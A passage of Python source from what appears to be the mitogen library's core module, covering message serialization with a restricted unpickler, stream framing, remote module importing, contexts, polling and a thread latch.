"""Raised when an attempt is made to use a :py:class:`mitogen.core.Latch`
that has been marked closed."""
pass
class Blob(BytesType):
"""A serializable bytes subclass whose content is summarized in repr()
output, making it suitable for logging binary data."""
def __repr__(self):
return '[blob: %d bytes]' % len(self)
def __reduce__(self):
return (Blob, (BytesType(self),))
class Secret(UnicodeType):
"""A serializable unicode subclass whose content is masked in repr()
output, making it suitable for logging passwords."""
def __repr__(self):
return '[secret]'
if not PY3:
# TODO: what is this needed for in 2.x?
def __str__(self):
return UnicodeType(self)
def __reduce__(self):
return (Secret, (UnicodeType(self),))
class Kwargs(dict):
"""A serializable dict subclass that indicates the contained keys should be
be coerced to Unicode on Python 3 as required. Python 2 produces keyword
argument dicts whose keys are bytestrings, requiring a helper to ensure
compatibility with Python 3."""
if PY3:
def __init__(self, dct):
for k, v in dct.items():
if type(k) is bytes:
self[k.decode()] = v
else:
self[k] = v
def __repr__(self):
return 'Kwargs(%s)' % (dict.__repr__(self),)
def __reduce__(self):
return (Kwargs, (dict(self),))
class CallError(Error):
"""Serializable :class:`Error` subclass raised when
:py:meth:`Context.call() <mitogen.parent.Context.call>` fails. A copy of
the traceback from the external context is appended to the exception
message."""
def __init__(self, fmt=None, *args):
if not isinstance(fmt, BaseException):
Error.__init__(self, fmt, *args)
else:
e = fmt
fmt = '%s.%s: %s' % (type(e).__module__, type(e).__name__, e)
args = ()
tb = sys.exc_info()[2]
if tb:
fmt += '\n'
fmt += ''.join(traceback.format_tb(tb))
Error.__init__(self, fmt)
def __reduce__(self):
return (_unpickle_call_error, (self.args[0],))
def _unpickle_call_error(s):
if not (type(s) is UnicodeType and len(s) < 10000):
raise TypeError('cannot unpickle CallError: bad input')
inst = CallError.__new__(CallError)
Exception.__init__(inst, s)
return inst
class ChannelError(Error):
"""Raised when a channel dies or has been closed."""
remote_msg = 'Channel closed by remote end.'
local_msg = 'Channel closed by local end.'
class StreamError(Error):
"""Raised when a stream cannot be established."""
pass
class TimeoutError(Error):
"""Raised when a timeout occurs on a stream."""
pass
def to_text(o):
"""Coerce `o` to Unicode by decoding it from UTF-8 if it is an instance of
:class:`bytes`, otherwise pass it to the :class:`str` constructor. The
returned object is always a plain :class:`str`; any subclass is removed."""
if isinstance(o, BytesType):
return o.decode('utf-8')
return UnicodeType(o)
def has_parent_authority(msg, _stream=None):
"""Policy function for use with :class:`Receiver` and
:meth:`Router.add_handler` that requires incoming messages to originate
from a parent context, or on a :class:`Stream` whose :attr:`auth_id
<Stream.auth_id>` has been set to that of a parent context or the current
context."""
return (msg.auth_id == mitogen.context_id or
msg.auth_id in mitogen.parent_ids)
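# Typical registration sketch (`my_handler` is a hypothetical callback;
# Importer._install_handler() below does exactly this for LOAD_MODULE):
#     router.add_handler(fn=my_handler, handle=LOAD_MODULE,
#                        policy=has_parent_authority)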
def listen(obj, name, func):
"""
Arrange for `func(*args, **kwargs)` to be invoked when the named signal is
fired by `obj`.
"""
signals = vars(obj).setdefault('_signals', {})
signals.setdefault(name, []).append(func)
def fire(obj, name, *args, **kwargs):
"""
Immediately invoke every function registered for the named signal on
`obj`, passing `*args` and `**kwargs`, and return the list of results.
"""
signals = vars(obj).get('_signals', {})
return [func(*args, **kwargs) for func in signals.get(name, ())]
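# Minimal usage sketch (`on_gone` is a hypothetical callback): Router and
# Stream below communicate teardown through this signal pair:
#     listen(stream, 'disconnect', on_gone)   # subscribe
#     fire(stream, 'disconnect')              # invoke all subscribers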
def takes_econtext(func):
func.mitogen_takes_econtext = True
return func
def takes_router(func):
func.mitogen_takes_router = True
return func
def is_blacklisted_import(importer, fullname):
"""
Return :data:`True` if `fullname` is part of a blacklisted package, or if
any packages have been whitelisted and `fullname` is not part of one.
NB:
- If a package is on both lists, then it is treated as blacklisted.
- If any package is whitelisted, then all non-whitelisted packages are
treated as blacklisted.
"""
return ((not any(fullname.startswith(s) for s in importer.whitelist)) or
(any(fullname.startswith(s) for s in importer.blacklist)))
def set_cloexec(fd):
"""Set the file descriptor `fd` to automatically close on
:func:`os.execve`. This has no effect on file descriptors inherited across
:func:`os.fork`, they must be explicitly closed through some other means,
such as :func:`mitogen.fork.on_fork`."""
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
assert fd > 2
fcntl.fcntl(fd, fcntl.F_SETFD, flags | fcntl.FD_CLOEXEC)
def set_nonblock(fd):
"""Set the file descriptor `fd` to non-blocking mode. For most underlying
file types, this causes :func:`os.read` or :func:`os.write` to raise
:class:`OSError` with :data:`errno.EAGAIN` rather than block the thread
when the underlying kernel buffer is exhausted."""
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
def set_block(fd):
"""Inverse of :func:`set_nonblock`, i.e. cause `fd` to block the thread
when the underlying kernel buffer is exhausted."""
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, flags & ~os.O_NONBLOCK)
def io_op(func, *args):
"""Wrap `func(*args)` that may raise :class:`select.error`,
:class:`IOError`, or :class:`OSError`, trapping UNIX error codes relating
to disconnection and retry events in various subsystems:
* When a signal is delivered to the process on Python 2, system call retry
is signalled through :data:`errno.EINTR`. The invocation is automatically
restarted.
* When performing IO against a TTY, disconnection of the remote end is
signalled by :data:`errno.EIO`.
* When performing IO against a socket, disconnection of the remote end is
signalled by :data:`errno.ECONNRESET`.
* When performing IO against a pipe, disconnection of the remote end is
signalled by :data:`errno.EPIPE`.
:returns:
Tuple of `(return_value, disconnected)`, where `return_value` is the
return value of `func(\*args)`, and `disconnected` is :data:`True` if
disconnection was detected, otherwise :data:`False`.
"""
while True:
try:
return func(*args), False
except (select.error, OSError, IOError):
e = sys.exc_info()[1]
_vv and IOLOG.debug('io_op(%r) -> OSError: %s', func, e)
if e.args[0] == errno.EINTR:
continue
if e.args[0] in (errno.EIO, errno.ECONNRESET, errno.EPIPE):
return None, True
raise
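# Example call (a sketch; `fd` stands for any readable descriptor), the same
# pattern Side.read() uses below:
#     s, disconnected = io_op(os.read, fd, 4096)
#     if disconnected:
#         pass  # EIO/ECONNRESET/EPIPE: the peer went away; not an error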
class PidfulStreamHandler(logging.StreamHandler):
"""A :class:`logging.StreamHandler` subclass used when
:meth:`Router.enable_debug() <mitogen.master.Router.enable_debug>` has been
called, or the `debug` parameter was specified during context construction.
Verifies the process ID has not changed on each call to :meth:`emit`,
reopening the associated log file when a change is detected.
This ensures logging to the per-process output files happens correctly even
when uncooperative third party components call :func:`os.fork`.
"""
#: PID that last opened the log file.
open_pid = None
#: Output path template.
template = '/tmp/mitogen.%s.%s.log'
def _reopen(self):
self.acquire()
try:
if self.open_pid == os.getpid():
return
ts = time.strftime('%Y%m%d_%H%M%S')
path = self.template % (os.getpid(), ts)
self.stream = open(path, 'w', 1)
set_cloexec(self.stream.fileno())
self.stream.write('Parent PID: %s\n' % (os.getppid(),))
self.stream.write('Created by:\n\n%s\n' % (
''.join(traceback.format_stack()),
))
self.open_pid = os.getpid()
finally:
self.release()
def emit(self, record):
if self.open_pid != os.getpid():
self._reopen()
logging.StreamHandler.emit(self, record)
def enable_debug_logging():
global _v, _vv
_v = True
_vv = True
root = logging.getLogger()
root.setLevel(logging.DEBUG)
IOLOG.setLevel(logging.DEBUG)
handler = PidfulStreamHandler()
handler.formatter = logging.Formatter(
'%(asctime)s %(levelname).1s %(name)s: %(message)s',
'%H:%M:%S'
)
root.handlers.insert(0, handler)
_profile_hook = lambda name, func, *args: func(*args)
def enable_profiling():
global _profile_hook
import cProfile
import pstats
def _profile_hook(name, func, *args):
profiler = cProfile.Profile()
profiler.enable()
try:
return func(*args)
finally:
profiler.dump_stats('/tmp/mitogen.%d.%s.pstat' % (os.getpid(), name))
profiler.create_stats()
fp = open('/tmp/mitogen.stats.%d.%s.log' % (os.getpid(), name), 'w')
try:
stats = pstats.Stats(profiler, stream=fp)
stats.sort_stats('cumulative')
stats.print_stats()
finally:
fp.close()
def import_module(modname):
"""
Import and return the module named `modname`.
"""
return __import__(modname, None, None, [''])
if PY3:
# In 3.x Unpickler is a class exposing find_class as an overridable, but it
# cannot be overridden without subclassing.
class _Unpickler(pickle.Unpickler):
def find_class(self, module, func):
return self.find_global(module, func)
else:
# In 2.x Unpickler is a function exposing a writeable find_global
# attribute.
_Unpickler = pickle.Unpickler
class Message(object):
dst_id = None
src_id = None
auth_id = None
handle = None
reply_to = None
data = b('')
_unpickled = object()
router = None
receiver = None
def __init__(self, **kwargs):
self.src_id = mitogen.context_id
self.auth_id = mitogen.context_id
vars(self).update(kwargs)
assert isinstance(self.data, BytesType)
def _unpickle_context(self, context_id, name):
return _unpickle_context(self.router, context_id, name)
def _unpickle_sender(self, context_id, dst_handle):
return _unpickle_sender(self.router, context_id, dst_handle)
def _unpickle_bytes(self, s, encoding):
s, n = LATIN1_CODEC.encode(s)
return s
def _find_global(self, module, func):
"""Return the class implementing `module_name.class_name` or raise
`StreamError` if the module is not whitelisted."""
if module == __name__:
if func == '_unpickle_call_error':
return _unpickle_call_error
elif func == '_unpickle_sender':
return self._unpickle_sender
elif func == '_unpickle_context':
return self._unpickle_context
elif func == 'Blob':
return Blob
elif func == 'Secret':
return Secret
elif func == 'Kwargs':
return Kwargs
elif module == '_codecs' and func == 'encode':
return self._unpickle_bytes
elif module == '__builtin__' and func == 'bytes':
return BytesType
raise StreamError('cannot unpickle %r/%r', module, func)
@property
def is_dead(self):
return self.reply_to == IS_DEAD
@classmethod
def dead(cls, **kwargs):
return cls(reply_to=IS_DEAD, **kwargs)
@classmethod
def pickled(cls, obj, **kwargs):
self = cls(**kwargs)
try:
self.data = pickle.dumps(obj, protocol=2)
except pickle.PicklingError:
e = sys.exc_info()[1]
self.data = pickle.dumps(CallError(e), protocol=2)
return self
def reply(self, msg, router=None, **kwargs):
if not isinstance(msg, Message):
msg = Message.pickled(msg)
msg.dst_id = self.src_id
msg.handle = self.reply_to
vars(msg).update(kwargs)
if msg.handle:
(self.router or router).route(msg)
else:
LOG.debug('Message.reply(): discarding due to zero handle: %r', msg)
if PY3:
UNPICKLER_KWARGS = {'encoding': 'bytes'}
else:
UNPICKLER_KWARGS = {}
def unpickle(self, throw=True, throw_dead=True):
"""Deserialize `data` into an object."""
_vv and IOLOG.debug('%r.unpickle()', self)
if throw_dead and self.is_dead:
raise ChannelError(ChannelError.remote_msg)
obj = self._unpickled
if obj is Message._unpickled:
fp = BytesIO(self.data)
unpickler = _Unpickler(fp, **self.UNPICKLER_KWARGS)
unpickler.find_global = self._find_global
try:
# Must occur off the broker thread.
obj = unpickler.load()
self._unpickled = obj
except (TypeError, ValueError):
e = sys.exc_info()[1]
raise StreamError('invalid message: %s', e)
if throw:
if isinstance(obj, CallError):
raise obj
return obj
def __repr__(self):
return 'Message(%r, %r, %r, %r, %r, %r..%d)' % (
self.dst_id, self.src_id, self.auth_id, self.handle,
self.reply_to, (self.data or '')[:50], len(self.data)
)
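# Round-trip sketch (illustrative; assumes mitogen.context_id is set, as it
# is in any running context):
#     m = Message.pickled({'a': 1}, handle=CALL_FUNCTION)
#     assert m.unpickle() == {'a': 1}   # plain data survives the round trip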
class Sender(object):
def __init__(self, context, dst_handle):
self.context = context
self.dst_handle = dst_handle
def __repr__(self):
return 'Sender(%r, %r)' % (self.context, self.dst_handle)
def __reduce__(self):
return _unpickle_sender, (self.context.context_id, self.dst_handle)
def close(self):
"""Indicate this channel is closed to the remote side."""
_vv and IOLOG.debug('%r.close()', self)
self.context.send(Message.dead(handle=self.dst_handle))
def send(self, data):
"""Send `data` to the remote."""
_vv and IOLOG.debug('%r.send(%r..)', self, repr(data)[:100])
self.context.send(Message.pickled(data, handle=self.dst_handle))
def _unpickle_sender(router, context_id, dst_handle):
if not (isinstance(router, Router) and
isinstance(context_id, (int, long)) and context_id >= 0 and
isinstance(dst_handle, (int, long)) and dst_handle > 0):
raise TypeError('cannot unpickle Sender: bad input')
return Sender(Context(router, context_id), dst_handle)
class Receiver(object):
notify = None
raise_channelerror = True
def __init__(self, router, handle=None, persist=True,
respondent=None, policy=None):
self.router = router
self.handle = handle # Avoid __repr__ crash in add_handler()
self._latch = Latch() # Must exist prior to .add_handler()
self.handle = router.add_handler(
fn=self._on_receive,
handle=handle,
policy=policy,
persist=persist,
respondent=respondent,
)
def __repr__(self):
return 'Receiver(%r, %r)' % (self.router, self.handle)
def to_sender(self):
context = Context(self.router, mitogen.context_id)
return Sender(context, self.handle)
def _on_receive(self, msg):
"""Callback from the Stream; appends data to the internal queue."""
_vv and IOLOG.debug('%r._on_receive(%r)', self, msg)
self._latch.put(msg)
if self.notify:
self.notify(self)
def close(self):
if self.handle:
self.router.del_handler(self.handle)
self.handle = None
self._latch.put(Message.dead())
def empty(self):
return self._latch.empty()
def get(self, timeout=None, block=True, throw_dead=True):
_vv and IOLOG.debug('%r.get(timeout=%r, block=%r)', self, timeout, block)
msg = self._latch.get(timeout=timeout, block=block)
if msg.is_dead and throw_dead:
if msg.src_id == mitogen.context_id:
raise ChannelError(ChannelError.local_msg)
else:
raise ChannelError(ChannelError.remote_msg)
return msg
def __iter__(self):
while True:
msg = self.get(throw_dead=False)
if msg.is_dead:
return
yield msg
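# Rough usage sketch (`process` is a hypothetical function): a Receiver's
# handle can be exported to a peer as a picklable Sender:
#     recv = Receiver(router)        # allocates a handle on this router
#     sender = recv.to_sender()      # send this to the remote context
#     for msg in recv:               # iteration ends on a dead message
#         process(msg.unpickle())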
class Channel(Sender, Receiver):
def __init__(self, router, context, dst_handle, handle=None):
Sender.__init__(self, context, dst_handle)
Receiver.__init__(self, router, handle)
def __repr__(self):
return 'Channel(%s, %s)' % (
Sender.__repr__(self),
Receiver.__repr__(self)
)
class Importer(object):
"""
Import protocol implementation that fetches modules from the parent
process.
:param context: Context to communicate via.
"""
def __init__(self, router, context, core_src, whitelist=(), blacklist=()):
self._context = context
self._present = {'mitogen': [
'compat',
'debug',
'doas',
'docker',
'fakessh',
'fork',
'jail',
'lxc',
'lxd',
'master',
'minify',
'parent',
'select',
'service',
'setns',
'ssh',
'su',
'sudo',
'utils',
]}
self._lock = threading.Lock()
self.whitelist = list(whitelist) or ['']
self.blacklist = list(blacklist) + [
# 2.x generates needless imports for 'builtins', while 3.x does the
# same for '__builtin__'. The correct spelling is a built-in module;
# requesting the other is always a wasted negative round-trip.
'builtins',
'__builtin__',
# org.python.core imported by copy, pickle, xml.sax; breaks Jython,
# but very unlikely to trigger a bug report.
'org',
]
if PY3:
self.blacklist += ['cStringIO']
# Presence of an entry in this map indicates in-flight GET_MODULE.
self._callbacks = {}
self._cache = {}
if core_src:
self._cache['mitogen.core'] = (
'mitogen.core',
None,
'mitogen/core.py',
zlib.compress(core_src, 9),
[],
)
self._install_handler(router)
def _install_handler(self, router):
router.add_handler(
fn=self._on_load_module,
handle=LOAD_MODULE,
policy=has_parent_authority,
)
def __repr__(self):
return 'Importer()'
def builtin_find_module(self, fullname):
# imp.find_module() will always succeed for __main__, because it is a
# built-in module. That means it exists on a special linked list deep
# within the bowels of the interpreter. We must special case it.
if fullname == '__main__':
raise ImportError()
parent, _, modname = fullname.rpartition('.')
if parent:
path = sys.modules[parent].__path__
else:
path = None
fp, pathname, description = imp.find_module(modname, path)
if fp:
fp.close()
def find_module(self, fullname, path=None):
if hasattr(_tls, 'running'):
return None
_tls.running = True
try:
_v and LOG.debug('%r.find_module(%r)', self, fullname)
pkgname, dot, _ = fullname.rpartition('.')
pkg = sys.modules.get(pkgname)
if pkgname and getattr(pkg, '__loader__', None) is not self:
LOG.debug('%r: %r is submodule of a package we did not load',
self, fullname)
return None
suffix = fullname[len(pkgname+dot):]
if pkgname and suffix not in self._present.get(pkgname, ()):
LOG.debug('%r: master doesn\'t know %r', self, fullname)
return None
# #114: explicitly whitelisted prefixes override any
# system-installed package.
if self.whitelist != ['']:
if any(fullname.startswith(s) for s in self.whitelist):
return self
try:
self.builtin_find_module(fullname)
_vv and IOLOG.debug('%r: %r is available locally',
self, fullname)
except ImportError:
_vv and IOLOG.debug('find_module(%r) returning self', fullname)
return self
finally:
del _tls.running
def _refuse_imports(self, fullname):
if is_blacklisted_import(self, fullname):
raise ImportError('Refused: ' + fullname)
f = sys._getframe(2)
requestee = f.f_globals['__name__']
if fullname == '__main__' and requestee == 'pkg_resources':
# Anything that imports pkg_resources will eventually cause
# pkg_resources to try and scan __main__ for its __requires__
# attribute (pkg_resources/__init__.py::_build_master()). This
# breaks any app that is not expecting its __main__ to suddenly be
# sucked over a network and injected into a remote process, like
# py.test.
raise ImportError('Refused')
if fullname == 'pbr':
# It claims to use pkg_resources to read version information, which
# would result in PEP-302 being used, but it actually does direct
# filesystem access. So instead smodge the environment to override
# any version that was defined. This will probably break something
# later.
os.environ['PBR_VERSION'] = '0.0.0'
def _on_load_module(self, msg):
if msg.is_dead:
return
tup = msg.unpickle()
fullname = tup[0]
_v and LOG.debug('Importer._on_load_module(%r)', fullname)
self._lock.acquire()
try:
self._cache[fullname] = tup
callbacks = self._callbacks.pop(fullname, [])
finally:
self._lock.release()
for callback in callbacks:
callback()
def _request_module(self, fullname, callback):
self._lock.acquire()
try:
present = fullname in self._cache
if not present:
funcs = self._callbacks.get(fullname)
if funcs is not None:
_v and LOG.debug('_request_module(%r): in flight', fullname)
funcs.append(callback)
else:
_v and LOG.debug('_request_module(%r): new request', fullname)
self._callbacks[fullname] = [callback]
self._context.send(
Message(data=b(fullname), handle=GET_MODULE)
)
finally:
self._lock.release()
if present:
callback()
def load_module(self, fullname):
fullname = to_text(fullname)
_v and LOG.debug('Importer.load_module(%r)', fullname)
self._refuse_imports(fullname)
event = threading.Event()
self._request_module(fullname, event.set)
event.wait()
ret = self._cache[fullname]
if ret[2] is None:
raise ImportError('Master does not have %r' % (fullname,))
pkg_present = ret[1]
mod = sys.modules.setdefault(fullname, imp.new_module(fullname))
mod.__file__ = self.get_filename(fullname)
mod.__loader__ = self
if pkg_present is not None: # it's a package.
mod.__path__ = []
mod.__package__ = fullname
self._present[fullname] = pkg_present
else:
mod.__package__ = fullname.rpartition('.')[0] or None
if mod.__package__ and not PY3:
# 2.x requires __package__ to be exactly a string.
mod.__package__ = mod.__package__.encode()
source = self.get_source(fullname)
code = compile(source, mod.__file__, 'exec', 0, 1)
if PY3:
exec(code, vars(mod))
else:
exec('exec code in vars(mod)')
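# (The string form hides the 2.x-only 'exec code in d' statement from the
# 3.x parser, which would otherwise reject the whole file at compile time.)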
return mod
def get_filename(self, fullname):
if fullname in self._cache:
path = self._cache[fullname][2]
if path is None:
# If find_loader() returns self but a subsequent master RPC
# reveals the module can't be loaded, and so load_module()
# throws ImportError, on Python 3.x it is still possible for
# the loader to be called to fetch metadata.
raise ImportError('master cannot serve %r' % (fullname,))
return u'master:' + path
def get_source(self, fullname):
if fullname in self._cache:
compressed = self._cache[fullname][3]
if compressed is None:
raise ImportError('master cannot serve %r' % (fullname,))
source = zlib.decompress(compressed)
if PY3:
return to_text(source)
return source
class LogHandler(logging.Handler):
def __init__(self, context):
logging.Handler.__init__(self)
self.context = context
self.local = threading.local()
self._buffer = []
def uncork(self):
self._send = self.context.send
for msg in self._buffer:
self._send(msg)
self._buffer = None
def _send(self, msg):
self._buffer.append(msg)
def emit(self, rec):
if rec.name == 'mitogen.io' or \
getattr(self.local, 'in_emit', False):
return
self.local.in_emit = True
try:
msg = self.format(rec)
encoded = '%s\x00%s\x00%s' % (rec.name, rec.levelno, msg)
if isinstance(encoded, UnicodeType):
# Logging package emits both :(
encoded = encoded.encode('utf-8')
self._send(Message(data=encoded, handle=FORWARD_LOG))
finally:
self.local.in_emit = False
class Side(object):
_fork_refs = weakref.WeakValueDictionary()
def __init__(self, stream, fd, cloexec=True, keep_alive=True, blocking=False):
self.stream = stream
self.fd = fd
self.closed = False
self.keep_alive = keep_alive
self._fork_refs[id(self)] = self
if cloexec:
set_cloexec(fd)
if not blocking:
set_nonblock(fd)
def __repr__(self):
return '<Side of %r fd %s>' % (self.stream, self.fd)
@classmethod
def _on_fork(cls):
for side in list(cls._fork_refs.values()):
side.close()
def close(self):
if not self.closed:
_vv and IOLOG.debug('%r.close()', self)
self.closed = True
os.close(self.fd)
def read(self, n=CHUNK_SIZE):
if self.closed:
# Refuse to touch the handle after closed, it may have been reused
# by another thread. TODO: synchronize read()/write()/close().
return b('')
s, disconnected = io_op(os.read, self.fd, n)
if disconnected:
return b('')
return s
def write(self, s):
if self.closed or self.fd is None:
# Refuse to touch the handle after closed, it may have been reused
# by another thread.
return None
written, disconnected = io_op(os.write, self.fd, s)
if disconnected:
return None
return written
class BasicStream(object):
receive_side = None
transmit_side = None
def on_disconnect(self, broker):
LOG.debug('%r.on_disconnect()', self)
if self.receive_side:
broker.stop_receive(self)
self.receive_side.close()
if self.transmit_side:
broker._stop_transmit(self)
self.transmit_side.close()
fire(self, 'disconnect')
def on_shutdown(self, broker):
_v and LOG.debug('%r.on_shutdown()', self)
fire(self, 'shutdown')
self.on_disconnect(broker)
class Stream(BasicStream):
"""
:py:class:`BasicStream` subclass implementing mitogen's :ref:`stream
protocol <stream-protocol>`.
"""
#: If not :data:`None`, :py:class:`Router` stamps this into
#: :py:attr:`Message.auth_id` of every message received on this stream.
auth_id = None
#: If not :data:`False`, indicates the stream has :attr:`auth_id` set and
#: its value is the same as :data:`mitogen.context_id` or appears in
#: :data:`mitogen.parent_ids`.
is_privileged = False
def __init__(self, router, remote_id, **kwargs):
self._router = router
self.remote_id = remote_id
self.name = u'default'
self.sent_modules = set(['mitogen', 'mitogen.core'])
self.construct(**kwargs)
self._input_buf = collections.deque()
self._output_buf = collections.deque()
self._input_buf_len = 0
self._output_buf_len = 0
def construct(self):
pass
def _internal_receive(self, broker, buf):
if self._input_buf and self._input_buf_len < 128:
self._input_buf[0] += buf
else:
self._input_buf.append(buf)
self._input_buf_len += len(buf)
while self._receive_one(broker):
pass
def on_receive(self, broker):
"""Handle the next complete message on the stream. Raise
:py:class:`StreamError` on failure."""
_vv and IOLOG.debug('%r.on_receive()', self)
buf = self.receive_side.read()
if not buf:
return self.on_disconnect(broker)
self._internal_receive(broker, buf)
HEADER_FMT = '>LLLLLL'
HEADER_LEN = struct.calcsize(HEADER_FMT)
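# Illustrative note: '>LLLLLL' packs six big-endian unsigned 32-bit fields
# (dst_id, src_id, auth_id, handle, reply_to, data length), so HEADER_LEN is
# 24 and each frame occupies exactly 24 + len(msg.data) bytes on the wire.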
def _receive_one(self, broker):
if self._input_buf_len < self.HEADER_LEN:
return False
msg = Message()
msg.router = self._router
(msg.dst_id, msg.src_id, msg.auth_id,
msg.handle, msg.reply_to, msg_len) = struct.unpack(
self.HEADER_FMT,
self._input_buf[0][:self.HEADER_LEN],
)
if msg_len > self._router.max_message_size:
LOG.error('Maximum message size exceeded (got %d, max %d)',
msg_len, self._router.max_message_size)
self.on_disconnect(broker)
return False
total_len = msg_len + self.HEADER_LEN
if self._input_buf_len < total_len:
_vv and IOLOG.debug(
'%r: Input too short (want %d, got %d)',
self, msg_len, self._input_buf_len - self.HEADER_LEN
)
return False
start = self.HEADER_LEN
prev_start = start
remain = total_len
bits = []
while remain:
buf = self._input_buf.popleft()
bit = buf[start:remain]
bits.append(bit)
remain -= len(bit) + start
prev_start = start
start = 0
msg.data = b('').join(bits)
self._input_buf.appendleft(buf[prev_start+len(bit):])
self._input_buf_len -= total_len
self._router._async_route(msg, self)
return True
def pending_bytes(self):
return self._output_buf_len
def on_transmit(self, broker):
"""Transmit buffered messages."""
_vv and IOLOG.debug('%r.on_transmit()', self)
if self._output_buf:
buf = self._output_buf.popleft()
written = self.transmit_side.write(buf)
if not written:
_v and LOG.debug('%r.on_transmit(): disconnection detected', self)
self.on_disconnect(broker)
return
elif written != len(buf):
self._output_buf.appendleft(BufferType(buf, written))
_vv and IOLOG.debug('%r.on_transmit() -> len %d', self, written)
self._output_buf_len -= written
if not self._output_buf:
broker._stop_transmit(self)
def _send(self, msg):
_vv and IOLOG.debug('%r._send(%r)', self, msg)
pkt = struct.pack(self.HEADER_FMT, msg.dst_id, msg.src_id,
msg.auth_id, msg.handle, msg.reply_to or 0,
len(msg.data)) + msg.data
if not self._output_buf_len:
self._router.broker._start_transmit(self)
self._output_buf.append(pkt)
self._output_buf_len += len(pkt)
def send(self, msg):
"""Send `data` to `handle`, and tell the broker we have output. May
be called from any thread."""
self._router.broker.defer(self._send, msg)
def on_shutdown(self, broker):
"""Override BasicStream behaviour of immediately disconnecting."""
_v and LOG.debug('%r.on_shutdown(%r)', self, broker)
def accept(self, rfd, wfd):
# TODO: what is this os.dup for?
self.receive_side = Side(self, os.dup(rfd))
self.transmit_side = Side(self, os.dup(wfd))
def __repr__(self):
cls = type(self)
return '%s.%s(%r)' % (cls.__module__, cls.__name__, self.name)
class Context(object):
remote_name = None
def __init__(self, router, context_id, name=None):
self.router = router
self.context_id = context_id
self.name = name
def __reduce__(self):
name = self.name
if name and not isinstance(name, UnicodeType):
name = UnicodeType(name, 'utf-8')
return _unpickle_context, (self.context_id, name)
def on_disconnect(self):
_v and LOG.debug('%r.on_disconnect()', self)
fire(self, 'disconnect')
def send_async(self, msg, persist=False):
if self.router.broker._thread == threading.currentThread(): # TODO
raise SystemError('Cannot make blocking call on broker thread')
receiver = Receiver(self.router, persist=persist, respondent=self)
msg.dst_id = self.context_id
msg.reply_to = receiver.handle
_v and LOG.debug('%r.send_async(%r)', self, msg)
self.send(msg)
return receiver
def call_service_async(self, service_name, method_name, **kwargs):
_v and LOG.debug('%r.call_service_async(%r, %r, %r)',
self, service_name, method_name, kwargs)
if isinstance(service_name, BytesType):
service_name = service_name.decode('utf-8')
elif not isinstance(service_name, UnicodeType):
service_name = service_name.name() # Service.name()
tup = (service_name, to_text(method_name), Kwargs(kwargs))
msg = Message.pickled(tup, handle=CALL_SERVICE)
return self.send_async(msg)
def send(self, msg):
"""send `obj` to `handle`, and tell the broker we have output. May
be called from any thread."""
msg.dst_id = self.context_id
self.router.route(msg)
def call_service(self, service_name, method_name, **kwargs):
recv = self.call_service_async(service_name, method_name, **kwargs)
return recv.get().unpickle()
def send_await(self, msg, deadline=None):
"""Send `msg` and wait for a response with an optional timeout."""
receiver = self.send_async(msg)
response = receiver.get(deadline)
data = response.unpickle()
_vv and IOLOG.debug('%r.send_await() -> %r', self, data)
return data
def __repr__(self):
return 'Context(%s, %r)' % (self.context_id, self.name)
def _unpickle_context(router, context_id, name):
if not (isinstance(router, Router) and
isinstance(context_id, (int, long)) and context_id >= 0 and (
(name is None) or
(isinstance(name, UnicodeType) and len(name) < 100))
):
raise TypeError('cannot unpickle Context: bad input')
return router.context_class(router, context_id, name)
class Poller(object):
def __init__(self):
self._rfds = {}
self._wfds = {}
@property
def readers(self):
return list(self._rfds.items())
@property
def writers(self):
return list(self._wfds.items())
def __repr__(self):
return '%s(%#x)' % (type(self).__name__, id(self))
def close(self):
pass
def start_receive(self, fd, data=None):
self._rfds[fd] = data or fd
def stop_receive(self, fd):
self._rfds.pop(fd, None)
def start_transmit(self, fd, data=None):
self._wfds[fd] = data or fd
def stop_transmit(self, fd):
self._wfds.pop(fd, None)
def poll(self, timeout=None):
_vv and IOLOG.debug('%r.poll(%r)', self, timeout)
(rfds, wfds, _), _ = io_op(select.select,
self._rfds,
self._wfds,
(), timeout
)
for fd in rfds:
_vv and IOLOG.debug('%r: POLLIN for %r', self, fd)
yield self._rfds[fd]
for fd in wfds:
_vv and IOLOG.debug('%r: POLLOUT for %r', self, fd)
yield self._wfds[fd]
class Latch(object):
"""
A latch is a :py:class:`Queue.Queue`-like object that supports mutation and
waiting from multiple threads, however unlike :py:class:`Queue.Queue`,
waiting threads always remain interruptible, so CTRL+C always succeeds, and
waits where a timeout is set experience no wake up latency. These
properties are not possible in combination using the built-in threading
primitives available in Python 2.x.
Latches implement queues using the UNIX self-pipe trick, and a per-thread
:py:func:`socket.socketpair` that is lazily created the first time any
latch attempts to sleep on a thread, and dynamically associated with the
waiting Latch only for duration of the wait.
See :ref:`waking-sleeping-threads` for further discussion.
"""
poller_class = Poller
# The _cls_ prefixes here are to make it crystal clear in the code which
# state mutation isn't covered by :attr:`_lock`.
#: List of reusable :func:`socket.socketpair` tuples. The list is mutated
#: from multiple threads, the only safe operations are `append()` and `pop()`.
_cls_idle_socketpairs = []
#: List of every socket object that must be closed by :meth:`_on_fork`.
#: Inherited descriptors cannot be reused, as the duplicated handles
#: reference the same underlying kernel-side sockets still in use by
#: the parent process.
_cls_all_sockets = []
def __init__(self):
self.closed = False
self._lock = threading.Lock()
#: List of unconsumed enqueued items.
self._queue = []
#: List of `(wsock, cookie)` awaiting an element, where `wsock` is the
#: socketpair's write side, and `cookie` is the string to write.
self._sleeping = []
#: Number of elements of :attr:`_sleeping` that have already been
#: woken, and have a corresponding element index from :attr:`_queue`
#: assigned to them.
self._waking = 0
@classmethod
def _on_fork(cls):
"""
Clean up any files belonging to the parent process after a fork.
"""
cls._cls_idle_socketpairs = []
while cls._cls_all_sockets:
cls._cls_all_sockets.pop().close()
def close(self):
"""
Mark the latch as closed, and cause every sleeping thread to be woken,
with :py:class:`mitogen.core.LatchError` raised in each thread.
"""
self._lock.acquire()
try:
self.closed = True
while self._waking < len(self._sleeping):
wsock, cookie = self._sleeping[self._waking]
self._wake(wsock, cookie)
self._waking += 1
finally:
self._lock.release()
def empty(self):
"""
Return :py:data:`True` if calling :py:meth:`get` would block.
As with :py:class:`Queue.Queue`, :py:data:`True` may be returned even
though a subsequent call to :py:meth:`get` will succeed, since a
message may be posted at any moment between :py:meth:`empty` and
:py:meth:`get`.
As with :py:class:`Queue.Queue`, :py:data:`False` may be returned even
though a subsequent call to :py:meth:`get` will block, since another
waiting thread may be woken at any moment between :py:meth:`empty` and
